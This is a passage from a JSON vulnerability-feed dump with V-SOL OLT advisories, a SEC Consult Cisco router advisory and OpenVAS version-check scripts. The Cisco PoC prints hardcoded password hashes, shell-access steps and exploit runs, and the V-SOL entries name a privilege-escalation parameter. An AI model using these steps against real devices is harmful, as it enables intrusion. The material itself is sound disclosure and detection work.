Loader manipulation via request parameters (CVE-2014-0114)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-10-10T11:19:11", "published": "2019-10-10T11:18:55", "id": "RHSA-2019:2995", "href": "https://access.redhat.com/errata/RHSA-2019:2995", "type": "redhat", "title": "(RHSA-2019:2995) Important: Red Hat A-MQ Broker 7.5 release and security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zeroscience": [{"lastseen": "2019-10-16T10:33:36", "bulletinFamily": "exploit", "description": "Title: V-SOL GPON/EPON OLT Platform v2.03 Reflected XSS Vulnerability \nAdvisory ID: [ZSL-2019-5537](<ZSL-2019-5537.php>) \nType: Local/Remote \nImpact: Cross-Site Scripting \nRisk: (3/5) \nRelease Date: 26.09.2019 \n\n\n##### Summary\n\nGPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications. \n\n##### Description\n\nThe application is prone to multiple reflected cross-site scripting vulnerabilities due to a failure to properly sanitize user-supplied input to several parameters that are handled by various scripts. Attackers can exploit this issue to execute arbitrary HTML and script code in a user's browser session. \n\n##### Vendor\n\nGuangzhou V-SOLUTION Electronic Technology Co., Ltd. - <https://www.vsolcn.com>\n\n##### Affected Version\n\nV2.03.62R_IPv6 \nV2.03.54R \nV2.03.52R \nV2.03.49 \nV2.03.47 \nV2.03.40 \nV2.03.26 \nV2.03.24 \nV1.8.6 \nV1.4 \n\n##### Tested On\n\nGoAhead-Webs \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[gpon_olt_xss.txt](<../../codes/gpon_olt_xss.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://packetstormsecurity.com/files/154631> \n[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/167864> \n[3] <https://cxsecurity.com/issue/WLB-2019090194>\n\n##### Changelog\n\n[26.09.2019] - Initial release \n[03.10.2019] - Added reference [1], [2] and [3] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2019-09-26T00:00:00", "published": "2019-09-26T00:00:00", "id": "ZSL-2019-5537", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2019-5537.php", "title": "V-SOL GPON/EPON OLT Platform v2.03 Reflected XSS Vulnerability", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/gpon_olt_xss.txt"}, {"lastseen": "2019-10-16T10:33:40", "bulletinFamily": "exploit", "description": "Title: V-SOL GPON/EPON OLT Platform v2.03 Link Manipulation Vulnerability \nAdvisory ID: [ZSL-2019-5535](<ZSL-2019-5535.php>) \nType: Local/Remote \nImpact: Spoofing \nRisk: (3/5) \nRelease Date: 26.09.2019 \n\n\n##### Summary\n\nGPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications. \n\n##### Description\n\nInput passed via the 'parent' GET parameter in 'bindProfile.html' script is not properly verified before being used to redirect users. This can be exploited to redirect a logged-in user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain. \n\n##### Vendor\n\nGuangzhou V-SOLUTION Electronic Technology Co., Ltd. - <https://www.vsolcn.com>\n\n##### Affected Version\n\nV2.03.62R_IPv6 \nV2.03.54R \nV2.03.52R \nV2.03.49 \nV2.03.47 \nV2.03.40 \nV2.03.26 \nV2.03.24 \nV1.8.6 \nV1.4 \n\n##### Tested On\n\nGoAhead-Webs \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[gpon_olt_urlredirect.txt](<../../codes/gpon_olt_urlredirect.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://packetstormsecurity.com/files/154628> \n[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/167772> \n[3] <https://cxsecurity.com/issue/WLB-2019090193>\n\n##### Changelog\n\n[26.09.2019] - Initial release \n[03.10.2019] - Added reference [1], [2] and [3] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2019-09-26T00:00:00", "published": "2019-09-26T00:00:00", "id": "ZSL-2019-5535", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2019-5535.php", "title": "V-SOL GPON/EPON OLT Platform v2.03 Link Manipulation Vulnerability", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/gpon_olt_urlredirect.txt"}, {"lastseen": "2019-10-16T10:33:06", "bulletinFamily": "exploit", "description": "Title: V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation \nAdvisory ID: [ZSL-2019-5538](<ZSL-2019-5538.php>) \nType: Local/Remote \nImpact: Privilege Escalation \nRisk: (4/5) \nRelease Date: 26.09.2019 \n\n\n##### Summary\n\nGPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications. \n\n##### Description\n\nThe application suffers from a privilege escalation vulnerability. Normal user can elevate his/her privileges by sending a HTTP POST request setting the parameter 'user_role_mod' to integer value '1' gaining admin rights. \n\n##### Vendor\n\nGuangzhou V-SOLUTION Electronic Technology Co., Ltd. - <https://www.vsolcn.com>\n\n##### Affected Version\n\nV2.03.62R_IPv6 \nV2.03.54R \nV2.03.52R \nV2.03.49 \nV2.03.47 \nV2.03.40 \nV2.03.26 \nV2.03.24 \nV1.8.6 \nV1.4 \n\n##### Tested On\n\nGoAhead-Webs \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[gpon_olt_privesc.txt](<../../codes/gpon_olt_privesc.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/47435> \n[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/167771> \n[3] <https://cxsecurity.com/issue/WLB-2019090177> \n[4] <https://packetstormsecurity.com/files/154632>\n\n##### Changelog\n\n[26.09.2019] - Initial release \n[03.10.2019] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2019-09-26T00:00:00", "published": "2019-09-26T00:00:00", "id": "ZSL-2019-5538", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2019-5538.php", "title": "V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/gpon_olt_privesc.txt"}, {"lastseen": "2019-10-16T10:28:58", "bulletinFamily": "exploit", "description": "Title: V-SOL GPON/EPON OLT Platform v2.03 Cross-Site Request Forgery \nAdvisory ID: [ZSL-2019-5536](<ZSL-2019-5536.php>) \nType: Local/Remote \nImpact: Cross-Site Scripting \nRisk: (3/5) \nRelease Date: 26.09.2019 \n\n\n##### Summary\n\nGPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications. \n\n##### Description\n\nThe application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. \n\n##### Vendor\n\nGuangzhou V-SOLUTION Electronic Technology Co., Ltd. - <https://www.vsolcn.com>\n\n##### Affected Version\n\nV2.03.62R_IPv6 \nV2.03.54R \nV2.03.52R \nV2.03.49 \nV2.03.47 \nV2.03.40 \nV2.03.26 \nV2.03.24 \nV1.8.6 \nV1.4 \n\n##### Tested On\n\nGoAhead-Webs \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[gpon_olt_csrf.txt](<../../codes/gpon_olt_csrf.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://exchange.xforce.ibmcloud.com/vulnerabilities/167871> \n[2] <https://packetstormsecurity.com/files/154630> \n[3] <https://www.exploit-db.com/exploits/47434> \n[4] <https://cxsecurity.com/issue/WLB-2019090192>\n\n##### Changelog\n\n[26.09.2019] - Initial release \n[03.10.2019] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2019-09-26T00:00:00", "published": "2019-09-26T00:00:00", "id": "ZSL-2019-5536", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php", "title": "V-SOL GPON/EPON OLT Platform v2.03 Cross-Site Request Forgery", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/gpon_olt_csrf.txt"}], "packetstorm": [{"lastseen": "2019-09-05T23:02:41", "bulletinFamily": "exploit", "description": "", "modified": "2019-09-04T00:00:00", "published": "2019-09-04T00:00:00", "id": "PACKETSTORM:154361", "href": "https://packetstormsecurity.com/files/154361/Cisco-Device-Hardcoded-Credentials-GNU-glibc-BusyBox.html", "title": "Cisco Device Hardcoded Credentials / GNU glibc / BusyBox", "type": "packetstorm", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20190904-0 > \n======================================================================= \ntitle: Multiple vulnerabilities \nproduct: Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P, \nCisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160, \nCisco 160W \nvulnerable version: Cisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15 \nfixed version: see \"Solution\" \nCVE number: - \nimpact: High \nhomepage: https://www.cisco.com/ \nfound: 2019-05-15 \nby: T. Weber, S. Viehb\u00f6ck (Office Vienna) \nIoT Inspector \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Securely connecting your small business to the outside world is as important \nas connecting your internal network devices to one another. Cisco Small \nBusiness RV Series Routers offer virtual private networking (VPN) technology \nso your remote workers can connect to your network through a secure Internet \npathway.\" \n \nSource: https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html \n \n \nBusiness recommendation: \n------------------------ \nWe want to thank Cisco for the very quick and professional response and great \ncoordination. Customers are urged to update the firmware of their devices. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Hardcoded Credentials \nThe device contains hardcoded users and passwords which can be used to login \nvia SSH on an emulated device at least. \n \nDuring the communication with Cisco it turned out that: \n\"Accounts like the 'debug-admin' and 'root' can not be accessed \nfrom console port, CLI or webui\". \nTherefore, these accounts had no real functionality and cannot be used for \nmalicious actions. \n \n2) Known GNU glibc Vulnerabilities \nThe used GNU glibc in version 2.19 is outdated and contains multiple known \nvulnerabilities. The outdated version was found by IoT Inspector. One of \nthe discovered vulnerabilities (CVE-2015-7547, \"getaddrinfo() buffer overflow\") \nwas verified by using the MEDUSA scalable firmware runtime. \n \n3) Known BusyBox Vulnerabilities \nThe used BusyBox toolkit in version 1.23.2 is outdated and contains multiple \nknown vulnerabilities. The outdated version was found by IoT Inspector. \nOne of the discovered vulnerabilities (CVE-2017-16544) was verified by using \nthe MEDUSA scaleable firmware runtime. \n \n \n4) Multiple Vulnerabilities - IoT Inspector Report \nFurther information can be found in IoT Inspector report: \nhttps://r.sec-consult.com/ciscoiot \n \n \nProof of concept: \n----------------- \n1) Hardcoded Credentials \nThe following hardcoded hashes were found in the 'shadow' file of the firmware: \nroot:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:99999:7::: \ndebug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:99999:7::: \n[...] \n \nThe undocumented user 'debug-admin' is also contained in this file. \n \nStarting the dropbear daemon as background process on emulated firmware: \n------------------------------------------------------------------------------- \n# dropbear -E \n# [1109] <timestamp> Running in background \n# \n# [1112] <timestamp> Child connection from <IP>:52718 \n[1112] <timestamp> /var must be owned by user or root, and not writable by others \n[1112] <timestamp> Password auth succeeded for 'debug-admin' from <IP>:52718 \n------------------------------------------------------------------------------- \n \nLog on via another host connected to the same network. For this PoC the \npassword of the debug-admin was changed in the 'shadow' file. \n------------------------------------------------------------------------------- \n[root@localhost medusa]# ssh debug-admin@<IP> /bin/ash -i \ndebug-admin@<IP>'s password: \n/bin/ash: can't access tty; job control turned off \n \n \nBusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash) \n \n/tmp $ \n------------------------------------------------------------------------------- \n \nThe 'debug-admin' user has the same privileges like 'root'. This can be \ndetermined from the corresponding sudoers file in the firmware: \n[...] \n## User privilege specification \n## \nroot ALL=(ALL) ALL \ndebug-admin ALL=(ALL) ALL \n \n## Uncomment to allow members of group wheel to execute any command \n# %wheel ALL=(ALL) ALL \n[...] \n \nDuring the communication with Cisco it turned out that: \n\"Accounts like the 'debug-admin' and 'root' can not be accessed \nfrom console port, CLI or webui\". \nTherefore, these accounts had no real functionality and cannot be used for \nmalicious actions. \n \n2) Known GNU glibc Vulnerabilities \nGNU glibc version 2.19 contains multiple CVEs like: \nCVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472, \nCVE-2015-5277, CVE-2015-8778, CVE-2015-8779, CVE-2017-1000366 and more. \n \nThe getaddrinfo() buffer overflow vulnerability was checked with the help of \nthe exploit code from https://github.com/fjserna/CVE-2015-7547. It was compiled \nand executed on the emulated device to test the system. \n \n# python cve-2015-7547-poc.py & \n[1] 961 \n# chroot /medusa_rootfs/ bin/ash \n \n \nBusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash) \n \n# gdb cve-2015-7547_glibc_getaddrinfo \n[...] \n[UDP] Total Data len recv 36 \n[UDP] Total Data len recv 36 \nConnected with 127.0.0.1:41782 \n[TCP] Total Data len recv 76 \n[TCP] Request1 len recv 36 \n[TCP] Request2 len recv 36 \nCannot access memory at address 0x4 \n \nProgram received signal SIGSEGV, Segmentation fault. \n0x76f1fd58 in ?? () from /lib/libc.so.6 \n(gdb) \n \nReferences: \nhttps://security.googleblog.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html \nhttps://github.com/fjserna/CVE-2015-7547 \n \n \n3) Known BusyBox Vulnerabilities \nBusyBox version 1.23.2 contains multiple CVEs like: \nCVE-2016-2148, CVE-2016-6301, CVE-2015-9261, CVE-2016-2147, CVE-2018-20679, \nCVE-2017-16544 and CVE-2019-5747. \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device: \n \nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the \nvulnerability. \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n]55;test.txt \n# \n------------------------------------------------------------------------------- \n \n4) Multiple Vulnerabilities - IoT Inspector Report \nFurther information can be found in IoT Inspector report: \nhttps://r.sec-consult.com/ciscoiot \n \nThe summary is below: \nIoT Inspector Vulnerability #1 BusyBox CVE entries \nOutdated BusyBox version is affected by 7 published CVEs. \n \nIoT Inspector Vulnerability #2 curl CVE entries \nOutdated curl version is affected by 35 published CVEs. \n \nIoT Inspector Vulnerability #3 GNU glibc CVE entries \nOutdated GNU glibc version is affected by 44 published CVEs. \n \nIoT Inspector Vulnerability #4 GNU glibc getaddrinfo() buffer overflow \nOutdated GNU glibc version is affected by CVE-2015-7547. \n \nIoT Inspector Vulnerability #5 Hardcoded password hashes \nFirmware contains multiple hardcoded credentials. \n \nIoT Inspector Vulnerability #6 Linux Kernel CVE entries \nOutdated Linux Kernel version affected by 512 published CVEs. \n \nIoT Inspector Vulnerability #7 MiniUPnPd CVE entries \nOutdated MiniUPnPd version affected by 2 published CVEs. \n \nIoT Inspector Vulnerability #8 Dnsmasq CVE entries \nOutdated MiniUPnPd version affected by 1 published CVE. \n \nIoT Inspector Vulnerability #9 Linux Kernel Privilege Escalation \u201cpp_key\u201d \nOutdated Linux Kernel version is affected by CVE-2015-7547. \n \nIoT Inspector Vulnerability #10 OpenSSL CVE entries \nOutdated OpenSSL version affected by 6 published CVEs. \n \n \nVulnerable / tested versions: \n----------------------------- \nThe following firmware versions have been tested with IoT Inspector and \nfirmware emulation techniques: \nCisco RV340 / 1.0.02.16 \nCisco RV340W / 1.0.02.16 \nCisco RV345 / 1.0.02.16 \nCisco RV345P / 1.0.02.16 \nThe following firmware versions have been tested with IoT Inspector only: \nCisco RV260 / 1.0.00.15 \nCisco RV260P / 1.0.00.15 \nCisco RV260W / 1.0.00.15 \nCisco RV160 / 1.0.00.15 \nCisco RV160P / 1.0.00.15 \n \nThe firmware was obtained from the vendor website: \nhttps://software.cisco.com/download/home/286287791/type/282465789/release/1.0.02.16 \nhttps://software.cisco.com/download/home/286316464/type/282465789/release/1.0.00.15 \n \n \nVendor contact timeline: \n------------------------ \n2019-05-15: Contacting vendor through psirt@cisco.com. \n2019-05-16: Vendor confirmed the receipt. \n2019-05-2019-08: Periodic updates about the investigation from the vendor. \nClarification which of the reported issues will be fixed. \n2019-08-20: The vendor proposed the next possible publication date for the \nadvisory for 2019-09-04. The vendor added the RV160 and RV260 \nrouter series to be vulnerable to the same issues too. \n2019-09-04: Coordinated advisory release. \n \n \nSolution: \n--------- \nUpgrade to the newest available firmware version. \n \nAdditionally, the vendor provides the following security notice: \nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190904-sb-vpnrouter \n \n \nWorkaround: \n----------- \nNone. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. Weber / @2019 \n \n`\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/154361/SA-20190904-0.txt"}], "openvas": [{"lastseen": "2019-09-12T16:58:21", "bulletinFamily": "scanner", "description": "Roundcube Webmail is prone to multiple cross-site scripting vulnerabilities.", "modified": "2019-09-10T00:00:00", "published": "2019-09-02T00:00:00", "id": "OPENVAS:1361412562310114124", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310114124", "title": "Roundcube Webmail < 0.9.3 Multiple XSS Vulnerabilities", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:roundcube:webmail';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.114124\");\n script_version(\"2019-09-10T11:55:44+0000\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 11:55:44 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-02 15:35:24 +0200 (Mon, 02 Sep 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2013-5645\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Roundcube Webmail < 0.9.3 Multiple XSS Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_roundcube_detect.nasl\");\n script_mandatory_keys(\"roundcube/detected\");\n\n script_tag(name:\"summary\", value:\"Roundcube Webmail is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"These XSS vulnerabilities allow user-assisted remote attackers to inject\n arbitrary web scripts or HTML via the body of a message visited in (1) new or (2) draft mode, related\n to compose.inc and (3) might allow remote authenticated users to inject arbitrary web scripts or HTML\n via an HTML signature, related to save_identity.inc.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Roundcube Webmail versions before 0.9.3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 0.9.3, or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/roundcube/roundcubemail/issues/4283\");\n script_xref(name:\"URL\", value:\"https://github.com/roundcube/roundcubemail/wiki/Changelog#Release0.9.3\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe: CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version: version, test_version: \"0.8.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"0.8.1\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-30T12:58:34", "bulletinFamily": "scanner", "description": "ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.", "modified": "2019-08-29T00:00:00", "published": "2019-08-28T00:00:00", "id": "OPENVAS:1361412562310108628", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108628", "title": "Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Linux)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108628\");\n script_version(\"2019-08-29T07:36:00+0000\");\n script_bugtraq_id(67064, 67081);\n script_cve_id(\"CVE-2014-0112\", \"CVE-2014-0113\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-29 07:36:00 +0000 (Thu, 29 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-28 07:41:10 +0000 (Wed, 28 Aug 2019)\");\n script_name(\"Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-021\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67064\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67081\");\n\n script_tag(name:\"summary\", value:\"ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.20 or later.\");\n\n script_tag(name:\"insight\", value:\"The excluded parameter pattern introduced in version 2.3.16.1 to block\n access to getClass() method wasn't sufficient. It is possible to omit that with specially crafted requests.\n Also CookieInterceptor is vulnerable for the same kind of attack when it was configured to accept all\n cookies (when '*' is used to configure cookiesName param).\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.16.3.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can execute arbitrary Java code via crafted\n parameters.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\nif(vers !~ \"^2\\.[0-3]\\.\")\n exit(99);\n\nif(version_in_range(version:vers, test_version:\"2.0.0\", test_version2:\"2.3.16.3\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.3.20\", install_path:infos[\"location\"]);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-30T12:58:35", "bulletinFamily": "scanner", "description": "This host is running Apache Struts and is\n prone to multiple vulnerabilities.", "modified": "2019-08-29T00:00:00", "published": "2019-08-28T00:00:00", "id": "OPENVAS:1361412562310108626", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108626", "title": "Apache Struts 2.x < 2.3.16.1 Multiple Vulnerabilities (S2-020) (Linux)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# 